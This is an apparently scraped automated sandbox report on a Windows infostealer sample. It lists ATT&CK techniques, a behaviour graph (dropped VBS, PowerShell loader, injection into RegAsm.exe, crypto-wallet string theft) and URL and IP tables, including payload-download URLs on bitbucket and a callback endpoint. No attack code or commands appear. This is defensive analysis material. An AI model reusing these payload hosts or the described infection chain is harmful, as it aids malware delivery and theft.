                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts12
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Access Token Manipulation                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop Protocol3
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution                  		1
                  Registry Run Keys / Startup Folder                  		211
                  Process Injection                  		1
                  Obfuscated Files or Information                  		Security Account Manager117
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Command and Scripting Interpreter                  		Login Hook1
                  Registry Run Keys / Startup Folder                  		1
                  Install Root Certificate                  		NTDS221
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell                  		Network Logon ScriptNetwork Logon Script1
                  Software Packing                  		LSA Secrets1
                  Process Discovery                  		SSHKeylogging13
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Timestomp                  		Cached Domain Credentials241
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Masquerading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt241
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd211
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519351 Sample: sRMytgfRpJ.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 36 raw.githubusercontent.com 2->36 38 bitbucket.org 2->38 40 3 other IPs or domains 2->40 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 14 other signatures 2->64 11 sRMytgfRpJ.exe 1 3 2->11         started        signatures3 process4 file5 34 C:\Users\user\AppData\Local\Temp\...\fqt.vbs, ASCII 11->34 dropped 14 cmd.exe 3 2 11->14         started        process6 process7 16 wscript.exe 1 14->16         started        19 conhost.exe 14->19         started        signatures8 50 Suspicious powershell command line found 16->50 52 Wscript starts Powershell (via cmd or directly) 16->52 54 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->54 56 Suspicious execution chain found 16->56 21 powershell.exe 7 16->21         started        process9 signatures10 66 Suspicious powershell command line found 21->66 68 Found many strings related to Crypto-Wallets (likely being stolen) 21->68 70 Suspicious execution chain found 21->70 72 Found suspicious powershell code related to unpacking or dynamic code loading 21->72 24 powershell.exe 14 25 21->24         started        28 conhost.exe 21->28         started        process11 dnsIp12 42 raw.githubusercontent.com 185.199.109.133, 443, 49730 FASTLYUS Netherlands 24->42 44 bitbucket.org 185.166.143.49, 443, 49735 AMAZON-02US Germany 24->44 46 s3-w.us-east-1.amazonaws.com 52.216.210.153, 443, 49738 AMAZON-02US United States 24->46 74 Installs new ROOT certificates 24->74 76 Writes to foreign memory regions 24->76 78 Injects a PE file into a foreign processes 24->78 80 Loading BitLocker PowerShell Module 24->80 30 RegAsm.exe 6 24 24->30         started        signatures13 process14 dnsIp15 48 185.196.9.26, 49739, 6302 SIMPLECARRIERCH Switzerland 30->48 82 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->82 84 Installs new ROOT certificates 30->84 86 Found many strings related to Crypto-Wallets (likely being stolen) 30->86 88 3 other signatures 30->88 signatures16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  sRMytgfRpJ.exe13%ReversingLabs

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://api.ip.sb/ip0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary0%Avira URL Cloudsafe
                  http://tempuri.org/0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id23ResponseD0%Avira URL Cloudsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text0%Avira URL Cloudsafe
                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/sc/sct0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha10%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id90%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                  https://bitbucket.org/rulmerurk/ertertqw/downloads/wil25.txt0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id80%Avira URL Cloudsafe
                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id50%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id40%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id70%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id19Response0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id60%Avira URL Cloudsafe
                  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wsat/fault0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%Avira URL Cloudsafe
                  https://aui-cdn.atlassian.com/0%Avira URL Cloudsafe
                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wsat0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew0%Avira URL Cloudsafe
                  https://bitbucket.org0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp90%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id6Response0%Avira URL Cloudsafe
                  https://aka.ms/winsvr-2022-pshelp0%Avira URL Cloudsafe
                  https://bbuseruploads.s3.amazonaws.com0%Avira URL Cloudsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/04/sc0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id1ResponseD0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id9Response0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id210%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id220%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id200%Avira URL Cloudsafe
                  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA10%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id230%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA10%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id240%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id1Response0%Avira URL Cloudsafe
                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey0%Avira URL Cloudsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC0%Avira URL Cloudsafe
                  https://raw.githubusercontent.com0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                  https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?118117350%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/04/trust0%Avira URL Cloudsafe
                  https://cdn.cookielaw.org/0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id120%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id100%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id110%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id16Response0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id130%Avira URL Cloudsafe
                  https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id150%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id170%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id140%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id160%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id180%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id190%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  s3-w.us-east-1.amazonaws.com
                  		52.216.210.153
                  		truefalse
                    		unknown
                    bitbucket.org
                    		185.166.143.49
                    		truetrue
                      		unknown
                      raw.githubusercontent.com
                      		185.199.109.133
                      		truetrue
                        		unknown
                        bbuseruploads.s3.amazonaws.com
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://bitbucket.org/rulmerurk/ertertqw/downloads/wil25.txtfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/chrome_newtabRegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://tempuri.org/Entity/Id23ResponseDRegAsm.exe, 0000000A.00000002.2080065542.00000000033C2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id9RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id8RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id5RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id4RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id7RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id6RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id19ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aui-cdn.atlassian.com/powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2356536853.00000158A8C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://bitbucket.orgpowershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id6ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AA9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AAC0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ip.sb/ipRegAsm.exe, 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://bbuseruploads.s3.amazonaws.compowershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/scRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://go.micropowershell.exe, 00000006.00000002.2009787604.000001169AE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169BBE2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id9ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://tempuri.org/Entity/Id20RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id21RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id22RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id23RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id24RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.ecosia.org/newtab/RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://tempuri.org/Entity/Id1ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
